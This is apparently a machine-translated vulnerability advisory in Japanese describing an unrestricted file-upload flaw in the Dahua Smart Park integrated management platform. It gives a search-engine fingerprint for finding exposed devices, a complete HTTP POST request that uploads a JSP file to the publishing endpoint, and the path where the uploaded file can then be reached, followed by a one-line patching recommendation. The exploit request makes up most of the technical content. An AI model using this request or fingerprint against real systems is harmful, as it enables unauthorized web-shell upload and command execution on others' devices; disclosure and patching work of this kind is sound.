0x01 製品紹介
「大華スマートパーク統合管理プラットフォーム」は、公園運営、リソース配分、インテリジェントサービスなどの機能を備えた総合管理プラットフォームです。このプラットフォームは、多様化する管理ニーズに合わせて公園のリソース配分を最適化するのを支援すると同時に、インテリジェントなサービスを提供することでユーザーエクスペリエンスを向上させることを目的としています。
0x02 脆弱性の概要
Dahua Smart Park デバイスはファイル アップロード機能を公開しましたが、アップロードされるファイルの種類、サイズ、形式、パスなどを厳密に制限およびフィルタリングしていないため、攻撃者が悪意のあるファイルを作成してデバイスにアップロードし、使用することができます。この脆弱性により権限が取得され、任意のコマンドが実行されます。
0x03 再発環境
Intergraph フィンガープリント: web.body="/WPMS/asset/lib/gridster/"
0x04 脆弱性の再発
実証実験
POST /publishing/publishing/material/file/video HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="a.jsp"
test
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"
submit
--dd8f988919484abab3816881c55272a7--
URLを確認してください
http://your-ip/publishingImg/VIDEO/返回的文件名.jsp
アップロード
接続してみる
0x05 修復の提案
関連システムを使用するユーザーは、できるだけ早くパッチを適用すると同時にアクセス元を制限し、大華スマートパークの総合管理プラットフォームを公衆ネットワークや安全でないネットワーク環境にさらさないようにすることをお勧めします。